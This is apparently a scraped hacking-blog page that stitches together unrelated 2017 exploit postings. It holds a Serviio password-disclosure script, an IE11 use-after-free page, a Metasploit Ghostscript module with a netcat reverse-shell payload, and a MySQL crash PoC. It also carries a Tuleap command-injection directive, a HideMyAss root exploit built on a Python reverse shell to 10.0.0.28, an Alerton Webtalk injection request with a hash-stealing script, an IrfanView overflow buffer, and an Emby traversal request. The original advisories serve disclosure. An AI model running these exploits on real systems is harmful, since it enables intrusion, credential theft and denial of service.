#!/usr/bin/env python
#
#
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
#
#
# Vendor: Petr Nejedly | Six Lines Ltd
# Product web page: http://www.serviio.org
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
#
# Summary: Serviio is a free media server. It allows you to stream your media
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
# games console or mobile phone) on your connected home network.
#
# Vendor:
# "Security:
# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
# so that you can be sure your content is only accessed by you. Make sure you keep your password
# secure."
#
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
# by an information disclosure vulnerability due to improper access control enforcement
# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
# via a specially crafted request, to gain access to potentially sensitive information.
#
# Tested on: Restlet-Framework/2.2
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2017-5404
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
#
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
#
#
# 12.12.2016
#
import sys
import xml.etree.ElementTree as ET
from urllib2 import Request, urlopen
if (len(sys.argv) <= 2):
print '[*] Usage: serviio_id.py <ip address> <port>'
print '[*] Example: serviio_id.py 10.211.55.3 23423'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
print '\nPrinting ServiioLinks:'
print '----------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('serviioLink'):
print URLs.text
print
headers = {'Accept': 'application/xml'}
#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
print '\nPrinting directories:'
print '---------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('path'):
print URLs.text
print
headers = {'Accept': 'application/xml'}
request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
print '\nPrinting mediabrowser password:'
print '-------------------------------\n'
response_body = urlopen(request).read()
roottree = ET.fromstring(response_body)
for URLs in roottree.iter('remoteUserPassword'):
print URLs.text
print
'''
rewt@zslab:~# python serviio_id.py 10.211.55.3 23423
Printing ServiioLinks:
----------------------
serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource
Printing directories:
---------------------
/etc/apache2
/etc/asl
/etc/cups
/etc/defaults
/etc/emond.d
/etc/mach_init.d
/etc/mach_init_per_login_session.d
/etc/mach_init_per_user.d
/etc/manpaths.d
/etc/newsyslog.d
/etc/openldap
/etc/pam.d
/etc/paths.d
/etc/periodic
/etc/pf.anchors
/etc/postfix
/etc/ppp
/etc/racoon
/etc/security
/etc/snmp
/etc/ssh
/etc/ssl
/etc/sudoers.d
Printing mediabrowser password:
-------------------------------
s3cr3to
rewt@zslab:~#
'''
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863583596
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:black;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/********************************
* Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
* Google Dork: n/a
* Date: 03.05.2017
* Exploit Author: Marcin Ressel
* TT: @r_esselm
* Vendor Homepage: www.microsoft.com
* Software Link: n/a
* Version: 11.0.9600.18638
* Tested on: Windows 7
* CVE : n/a
* ****************************
(151c.10a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
706af750 ff36 push dword ptr [esi] ds:002b:1195cfa0=????????
0:007> !heap -p -a @esi
address 1195cfa0 found in
_DPH_HEAP_ROOT @ 9f61000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
ef4230c: 1195c000 2000
743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
76f4a863 ntdll!RtlpFreeHeap+0x0000005d
76ef2bd5 ntdll!RtlFreeHeap+0x00000142
769c14ad kernel32!HeapFree+0x00000014
707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
700c5484 MSHTML!CFrameSite::Passivate+0x00000024
6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
705517cb MSHTML!CBase::JSBind_Release+0x00000050
6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
*
*/
var ref = [];
var doc = null;
var dom = null;
var trg = null;
var trg_parent = null;
var text_r = null;
var select_o = null;
function handle() {
try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
try{text_r.select();}catch(e){}
try{tree_r.setEnd(ref[0],0);}catch(e){}
try{select_o.selectAllChildren(doc.body);}catch(e){}
try{tree_r.surroundContents(ref[0]);}catch(e){}
try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
try{tree_r.selectNodeContents(document.body);}catch(e){}
try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
}
function testcase() {
var e1f = document.getElementById("e1");
doc = document.getElementById("t1").contentWindow.document;
e = e1f.contentWindow.document.createElement("ins");
e.cite = 'about:blank';
rf = doc.body.appendChild(e);
ref.push(rf);
e = e1f.contentWindow.document.createElement("iframe");
rf = doc.body.appendChild(e);
ref.push(rf);
dom = doc.getElementsByTagName("*");
trg = dom[3];
trg_parent = doc.body;
text_r = doc.body.createTextRange();
tree_r = doc.createRange();
tree_r.setStart(trg,0);
tree_r.setEnd(trg,0);
select_o = window.getSelection();
var ob = new MutationObserver(handle);
ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true });
try {
trg.insertBefore(document.createElement("div"),ref[1]);
} catch(e) {}
doc.adoptNode(trg.attributes[0]);
trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "À";
tmp = trg;
}
</script>
<title>IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
</head>
<body onload='testcase();'>
<iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
</body>
</html>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
'Description' => %q{
This module exploits a type confusion vulnerability in Ghostscript that can
be exploited to obtain arbitrary command execution. This vulnerability affects
Ghostscript version 9.21 and earlier and can be exploited through libraries
such as ImageMagick and Pillow.
},
'Author' => [
'Atlassian Security Team', # Vulnerability discovery
'hdm' # Metasploit module
],
'References' => [
%w{CVE 2017-8291},
%w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
%w{URL http://seclists.org/oss-sec/2017/q2/148},
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
],
'DisclosureDate' => 'Apr 27 2017',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'BadChars' => "\x22\x27\x5c)(", # ", ', \, (, and )
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat bash-tcp'
}
},
'Targets' => [
['EPS file', template: 'msf.eps']
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat',
'LHOST' => Rex::Socket.source_address,
'DisablePayloadHandler' => false,
'WfsDelay' => 9001
}
))
register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
])
end
# Example usage from the bug tracker:
# $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps
def exploit
file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
end
def template
::File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
target[:template]
))
end
end
'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''
import socket
import sys
from struct import pack
'''
CVE-2017-3599 Proof of Concept exploit code.
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
Rodrigo Marcos
'''
if len(sys.argv)<2:
print "Usage: python " + sys.argv[0] + " host [port]"
exit(0)
else:
HOST = sys.argv[1]
if len(sys.argv)>2:
PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
else:
PORT = 3306
print "[+] Creating packet..."
'''
3 bytes Packet lenth
1 bytes Packet number
Login request:
Packet format (when the server is 4.1 or newer):
Bytes Content
----- ----
4 client capabilities
4 max packet size
1 charset number
23 reserved (always 0)
n user name, \0-terminated
n plugin auth data (e.g. scramble), length encoded
n database name, \0-terminated
(if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n client auth plugin name - \0-terminated string,
(if CLIENT_PLUGIN_AUTH is set in the capabilities)
'''
# packet_len = '\x64\x00\x00'
packet_num = '\x01'
#Login request packet
packet_cap = '\x85\xa2\xbf\x01' # client capabilities (default)
packet_max = '\x00\x00\x00\x01' # max packet size (default)
packet_cset = '\x21' # charset (default)
p_reserved = '\x00' * 23 # 23 bytes reserved with nulls (default)
packet_usr = 'test\x00' # username null terminated (default)
packet_auth = '\xff' # both \xff and \xfe crash the server
'''
Conditions to crash:
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars
The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i',len(packet))[:3]
request = packet_len + packet_num + packet
print "[+] Connecting to host..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connected."
except:
print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
s.close()
print "[+] Exiting."
exit(0)
print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."
print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request
s.close()
# Tuleap - Command Injection in Project Wiki
**CVE:** CVE-2017-7981
**CVSSv3:** 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)
**Versions affected:** >= 8.3 and <= 9.6.99.86
## Introduction
Tuleap is a Libre suite to plan, track, code and collaborate on software
projects. Tuleap helps development teams to build awesome applications,
better, faster, easier.
## Background
Tuleap uses PHPWiki as a plugin to provide a weak feature for
projects. The version of PHPWiki used is 1.3.10. This version contains a
command injection vulnerability in the SyntaxHighlighter plugin. Other
applications that use PHPWiki similar to Tuleap will also be affected
by this issue.
The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.
## Vulnerability
Authenticated users, including unprivileged users, with access to a
project containing a wiki, can exploit this command injection
(CI) vulnerability to gain remote unauthorised access to the server
hosting the Tuleap web application.
RCE is achieved by entering a SyntaxHighlighter plugin directive in a
new wiki page on any wiki available in any project. The SyntaxHighligter
plugin in vulnerable versions of PHPWiki passes the `syntax` argument
to the `proc_open()` PHP builtin function which spawns a process in the
operating system running the web application.
The following is an example plugin directie which would cause the `id(1)`
command to be executed on a Linux server running an affected version
of Tuleap.
```
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
```
The result of the command execution can be seen in the image below.
## Versions Affected
This vulnerability has existed in the version of PHPWiki used by the
Tuleap project since at least version 8.3 through to 9.6.99.86.
## References
https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md
https://tuleap.net/plugins/tracker/?aid=10159
## Credit
This vulnerability was discovered by Ben N (pajexali@gmail.com) 19
April 2017.
Source: https://www.securify.nl/advisory/SFY20170408/local_privilege_escalation_vulnerability_in_hidemyass_pro_vpn_client_v3_x_for_macos.html
Abstract
A local privilege escalation vulnerability has been found in the helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS. The helper is installed setuid root and uses the openvpn binary to create VPN profiles and connections. The helper fails to perform signature check's on the openvpn file, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
Tested versions:
This issue was tested on HideMyAss Pro VPN v3.3.0.3 for macOS.
Fix:
There is currently no fix available.
Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for macOS. It was discovered that version 3.x of HMA Pro VPN for macOS is affected by local privilege escalation.
Details:
The helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS is installed in PrivilegedHelperTools and run every time the user reboots. The privileged helper is responsible for opening VPN connections with correct security and connection profile settings.
The com.privax.hmaprovpn.helper is installed setuid root and fails to perform signature check's on the openvpn executable, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
/advisory/SFY20170408/runopenvpnasroot.png
/advisory/SFY20170408/startopenvpn.png
Proof of Concept:
1) Create an Python script named openvpn and make sure it is executable (chmod u+x).
#!/usr/bin/python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.28",8099));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
2) Replace the openvpn binary located in the path below with this Python script.
/Applications/HMA\!\ Pro\ VPN.app/Contents/XPCServices/HMA\!\ Pro\ VPN\ Engine.xpc/Contents/MacOS/
3) Wait until the victim opens a VPN connection.
Source: https://www.securify.nl/advisory/SFY20170402/multiple_local_privilege_escalation_vulnerabilities_in_hidemyass_pro_vpn_client_v2_x_for_os_x.html
Abstract
Multiple local privilege escalation vulnerabilities were found in the helper binary HMAHelper that ships with HideMyAss Pro VPN for OS X. The helper is installed setuid root and responsible for loading Kernel Extensions (kext) and managing VPN firewall rules. These issues can be leveraged by a local attacker to gain elevated (root) privileges.
Tested versions:
This issue was tested on HMA Pro VPN version 2.2.7.0 for OS X
Fix:
HMA Support has reported that this issue will not be fixed. Version 2.2.7.0. is still available for download and was earlier this year also available in the Mac App Store. It seems that this version is still available for older versions of OS X (OS X 10.7 - 10.11).
It should be noted the latest version of HMA Pro VPN for OS X (version 3.3.0.3) is vulnerable to a similar local privilege escalation issue that is also not fixed at the time of writing.
Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for OS X. It was discovered that version 2.x of HMA Pro VPN for OS X is affected by multiple local privilege escalation vulnerabilities.
Details:
The helper binary HMAHelper that ships with HMA Pro VPN for OS X is installed as setuid root. The helper has the ability to execute several commands as root, including running kernal extentions (kext) but also enabling and disabling security firewall rules.
Although disabling the firewall is dangerous enough, it was found that the helper is affected by multiple local privilege escalation vulnerabilities. Taking the FirewallDisable rule as an example, the code snippet below shows that there is no limit to which executable can be executed allowing a local user (or malware) to run any executable as root.
Privax.OSX.HMA.Helper.FirewallManager
private static void FirewallDisableSelected(string path, string args, string processNames)
{
using (Process process = new Process())
{
ProcessStartInfo startInfo = process.StartInfo;
startInfo.FileName = "/usr/bin/sudo";
startInfo.Arguments = string.Format("\"{0}\" \"{1}\" \"{2}\"", (object) path, (object) args, (object) processNames);
startInfo.CreateNoWindow = true;
startInfo.UseShellExecute = false;
PermissionsManager.PermissionsSet(PermissionsManager.UIDRoot, PermissionsManager.GIDWheel);
process.Start();
process.WaitForExit();
}
}
Proof of concept:
/Applications/HMA\!\ Pro\ VPN.app/Contents/Resources/Applications/HMAHelper.app/Contents/MacOS/HMAHelper --sib-firewall-enable 'su' ''
'''
Security Issues in Alerton Webtalk
==================================
Introduction
------------
Vulnerabilities were identified in the Alerton Webtalk Software supplied by
Alerton. This software is used for the management of building automation
systems. These were discovered during a black box assessment and therefore
the vulnerability list should not be considered exhaustive. Alerton has
responded that Webtalk is EOL and past the end of its support period. Customers
should move to newer products available from Alerton. Thanks to Alerton for prompt
replies in communicating with us about these issues.
Versions 2.5 and 3.3 were both confirmed to be affected by these issues.
Webtalk-01 - Password Hashes Accessible to Unauthenticated Users
----------------------------------------------------------------
Severity: **High**
Password hashes for all of the users configured in Alerton Webtalk are
accessible via a file in the document root of the ‘webtalk’ user. The
location of this file is configuration dependent, however the configuration file is
accessible as well (at a static location, /~webtalk/webtalk.ini). The
password
database is a sqlite3 database whose name is based on the bacnet rep and job
entries from the ini file.
A python proof of concept to reproduce this issue is in an appendix.
Recommendation: Do not store sensitive data within areas being served by the
webserver.
Webtalk-02 - Command Injection for Authenticated Webtalk Users
--------------------------------------------------------------
Severity: **High**
Any user granted the “configure webtalk” permission can execute commands as
the root user on the underlying server. There appears to be some effort of
filtering command strings (such as rejecting commands containing pipes and
redirection operators) but this is inadequate. Using this vulnerability, an
attacker can add an SSH key to the root user’s authorized_keys file.
GET
/~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True
HTTP/1.1
Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801
...
uid=0(root) gid=500(webtalk) groups=500(webtalk)
...
Recommendation: User input should be avoided to shell commands. If this is
not possible, shell commands should be properly escaped. Consider using one of
the functions from the subprocess module without the shell=True parameter.
Webtalk-03 - Cross-Site Request Forgery
---------------------------------------
Severity: **High**
The entire Webtalk administrative interface lacks any controls against
Cross-Site Request Forgery. This allows an attacker to execute
administrative changes without access to valid credentials. Combined with the above
vulnerability, this allows an attacker to gain root access without any
credentials.
Recommendation: Implement CSRF tokens on all state-changing actions.
Webtalk-04 - Insecure Credential Hashing
----------------------------------------
Severity: **Moderate**
Password hashes in the userprofile.db database are hashed by concatenating
the password with the username (e.g., PASSUSER) and performing a plain MD5
hash. No salts or iterative hashing is performed. This does not follow password
hashing best practices and makes for highly practical offline attacks.
Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.
Webtalk-05 - Login Flow Defeats Password Hashing
------------------------------------------------
Severity: **Moderate**
Password hashing is performed on the client side, allowing for the replay of
password hashes from Webtalk-01. While this only works on the mobile login
interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting
session is able to access all resources and is functionally equivalent to a login
through the Java-based login flow.
Recommendation: Perform hashing on the server side and use TLS to protect
secrets in transit.
Timeline
--------
2017/01/?? - Issues Discovered
2017/01/26 - Issues Reported to security@honeywell.com
2017/01/30 - Initial response from Alerton confirming receipt.
2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
2017/04/26 - This disclosure
Discovery
---------
These issues were discovered by David Tomaschik of the Google ISA
Assessments team.
Appendix A: Script to Extract Hashes
------------------------------------
'''
import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os
def get_webtalk_ini(base_url):
"""Get the webtalk.ini file and parse it."""
url = '%s/~webtalk/webtalk.ini' % base_url
r = requests.get(url)
if r.status_code != 200:
raise RuntimeError('Unable to get webtalk.ini: %s', url)
buf = StringIO.StringIO(r.text)
parser = ConfigParser.RawConfigParser()
parser.readfp(buf)
return parser
def get_db_path(base_url, config):
rep = config.get('bacnet', 'rep')
job = config.get('bacnet', 'job')
url = '%s/~webtalk/bts/%s/%s/userprofile.db'
return url % (base_url, rep, job)
def load_db(url):
"""Load and read the db."""
r = requests.get(url)
if r.status_code != 200:
raise RuntimeError('Unable to get %s.' % url)
tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
tmpf = os.fdopen(tmpfd, 'w')
tmpf.write(r.content)
tmpf.close()
con = sqlite3.connect(tmpname)
cur = con.cursor()
cur.execute("SELECT UserID, UserPassword FROM tblPassword")
results = cur.fetchall()
con.close()
os.unlink(tmpname)
return results
def users_for_server(base_url):
if '://' not in base_url:
base_url = 'http://%s' % base_url
ini = get_webtalk_ini(base_url)
db_path = get_db_path(base_url, ini)
return load_db(db_path)
if __name__ == '__main__':
for host in sys.argv[1:]:
try:
users = users_for_server(host)
except Exception as ex:
sys.stderr.write('%s\n' % str(ex))
continue
for u in users:
print '%s:%s' % (u[0], u[1])
# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)
#POC
#!usr/bin/python
eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll
buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc"
print buffer #a) irfanview->Option->Properties/Settings->Extensions
#b) Paste the buffer in the "other" input then press ok, repeat a) and b)
#badcharacters: those instruction that start with 6,7,8,E,F
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?
Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The vulnerability was confirmed on tested platforms depending on the version.
Version 3.1.0 is affecting Linux, Windows and Mac platforms. The 3.2.5 only affects
Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not
properly verified before being used to load resources. This can be exploited to disclose
the contents of arbitrary files via directory traversal attacks.
================================================================================
/Emby.Server.Implementations/HttpServer/SwaggerService.cs:
----------------------------------------------------------
using MediaBrowser.Controller;
using MediaBrowser.Controller.Net;
using System.IO;
using MediaBrowser.Model.IO;
using MediaBrowser.Model.Services;
namespace Emby.Server.Implementations.HttpServer
{
public class SwaggerService : IService, IRequiresRequest
{
private readonly IServerApplicationPaths _appPaths;
private readonly IFileSystem _fileSystem;
public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
{
_appPaths = appPaths;
_fileSystem = fileSystem;
_resultFactory = resultFactory;
}
/// <summary>
/// Gets the specified request.
/// </summary>
/// <param name="request">The request.</param>
/// <returns>System.Object.</returns>
public object Get(GetSwaggerResource request)
{
var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");
var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));
return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
}
/// <summary>
/// Gets or sets the result factory.
/// </summary>
/// <value>The result factory.</value>
private readonly IHttpResultFactory _resultFactory;
/// <summary>
/// Gets or sets the request context.
/// </summary>
/// <value>The request context.</value>
public IRequest Request { get; set; }
}
}
================================================================================
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5403
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5403.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "07bec80f76d20d26dd300a855219d321"
Cache-Control: public
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: application/octet-stream
Date: Thu, 22 Dec 2016 10:43:53 GMT
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
